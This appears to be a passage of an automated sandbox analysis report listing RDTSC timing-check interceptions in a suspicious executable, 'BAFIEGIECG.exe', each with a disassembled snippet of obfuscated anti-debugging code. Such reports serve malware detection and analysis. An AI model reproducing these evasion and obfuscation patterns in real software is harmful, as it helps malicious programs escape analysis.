Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615DC4 second address: 615E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e je 00007FF698E1E1A6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF698E1E1B0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 615FD7 second address: 615FF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6163AF second address: 6163B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6163B3 second address: 6163C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6163C1 second address: 6163C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6163C7 second address: 61640C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF698BF10C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FF698BF10C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D20D8h], ebx 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f jne 00007FF698BF10C8h 0x00000035 pushad 0x00000036 jl 00007FF698BF10C6h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 617373 second address: 61737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 618359 second address: 6183C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FF698BF10D9h 0x00000010 nop 0x00000011 mov esi, dword ptr [ebp+122D331Eh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FF698BF10C8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov edi, ebx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D2A2Bh] 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push edx 0x00000042 pop edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6183C8 second address: 6183CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6183CD second address: 6183E0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698BF10C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6183E0 second address: 6183E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6183E4 second address: 6183EE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698BF10C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 618C77 second address: 618C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FF698E1E1A6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 618C88 second address: 618C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 619934 second address: 619939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61AF93 second address: 61B008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jnc 00007FF698BF10D2h 0x0000000c nop 0x0000000d mov esi, 6A448BFBh 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D1B6Eh], edi 0x0000001a push 00000000h 0x0000001c mov edi, 3D232361h 0x00000021 mov di, 1E5Ch 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push esi 0x00000028 jmp 00007FF698BF10CAh 0x0000002d pop esi 0x0000002e pushad 0x0000002f jmp 00007FF698BF10D0h 0x00000034 jmp 00007FF698BF10D0h 0x00000039 popad 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d jnl 00007FF698BF10C8h 0x00000043 pushad 0x00000044 jnl 00007FF698BF10C6h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61B996 second address: 61B9B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF698E1E1B5h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61B9B3 second address: 61B9F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007FF698BF10D5h 0x0000000f mov edi, dword ptr [ebp+122D2D60h] 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a xchg eax, ebx 0x0000001b push edx 0x0000001c jmp 00007FF698BF10CDh 0x00000021 pop edx 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61E6DF second address: 61E6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61A252 second address: 61A266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61AD5B second address: 61AD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61A266 second address: 61A26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61A26C second address: 61A270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61FD30 second address: 61FDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF698BF10CDh 0x00000008 jmp 00007FF698BF10CEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ebx, 3D76F4A5h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FF698BF10C8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D2827h] 0x0000003a mov edi, dword ptr [ebp+122D29FFh] 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FF698BF10C8h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000017h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c mov ebx, 15F357B7h 0x00000061 xchg eax, esi 0x00000062 jmp 00007FF698BF10CEh 0x00000067 push eax 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FF698BF10CEh 0x00000070 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61EEB5 second address: 61EEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61FDD0 second address: 61FDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 620D8F second address: 620D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 621D71 second address: 621D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF698BF10C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 620F63 second address: 620F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61FFA1 second address: 61FFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 620F67 second address: 620F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 621D7B second address: 621E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF698BF10D7h 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D333Bh], eax 0x00000018 jmp 00007FF698BF10D7h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF698BF10C8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov edi, ebx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FF698BF10C8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 mov edi, dword ptr [ebp+122D2947h] 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 js 00007FF698BF10C6h 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61FFA5 second address: 61FFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1ABh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 621E1A second address: 621E24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61FFB4 second address: 61FFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 61FFB8 second address: 61FFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF698BF10C8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 621F5E second address: 621F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF698E1E1A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 624D79 second address: 624D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 624D7D second address: 624D87 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 624D87 second address: 624D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 624D8C second address: 624E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1AFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF698E1E1A8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push edi 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D29EBh] 0x00000033 mov edi, dword ptr [ebp+124828C0h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007FF698E1E1A8h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 xor ebx, dword ptr [ebp+122D1A75h] 0x0000005b xchg eax, esi 0x0000005c push edx 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 622056 second address: 62205C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62205C second address: 622062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 626E61 second address: 626E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 626E65 second address: 626E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FF698E1E1B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 626E75 second address: 626E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 627487 second address: 6274FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FF698E1E1A8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 or dword ptr [ebp+122D1A96h], ebx 0x00000028 push 00000000h 0x0000002a movzx ebx, ax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007FF698E1E1A8h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 or ebx, 7034C256h 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FF698E1E1B5h 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 623000 second address: 623006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 628414 second address: 62841B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 624F7C second address: 624F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 624F80 second address: 625018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jg 00007FF698E1E1BCh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FF698E1E1A8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FF698E1E1A8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov dword ptr [ebp+12468B7Dh], esi 0x00000050 mov edi, dword ptr [ebp+122D21EAh] 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f mov eax, dword ptr [ebp+122D0125h] 0x00000065 push FFFFFFFFh 0x00000067 mov dword ptr [ebp+1245A90Dh], ecx 0x0000006d push eax 0x0000006e js 00007FF698E1E1B8h 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 625018 second address: 62501C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62B511 second address: 62B515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62B515 second address: 62B5A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF698BF10D4h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov ebx, dword ptr [ebp+12456932h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FF698BF10C8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 add bl, 0000005Ah 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007FF698BF10C8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 mov di, 6A24h 0x00000057 mov dword ptr [ebp+1247F624h], edx 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push edi 0x00000062 pop edi 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62B5A0 second address: 62B5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62C661 second address: 62C667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 627659 second address: 627660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 627660 second address: 627666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62D6F2 second address: 62D6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62D6F6 second address: 62D6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62D6FC second address: 62D713 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62D713 second address: 62D717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62D717 second address: 62D71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62D71D second address: 62D724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62E76A second address: 62E7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FF698E1E1AAh 0x0000000f nop 0x00000010 jmp 00007FF698E1E1ADh 0x00000015 push 00000000h 0x00000017 clc 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FF698E1E1A8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+12468B8Ah], esi 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 pop edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 62E7C0 second address: 62E801 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698BF10C8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jno 00007FF698BF10D9h 0x00000014 pushad 0x00000015 jmp 00007FF698BF10D7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 628648 second address: 628660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
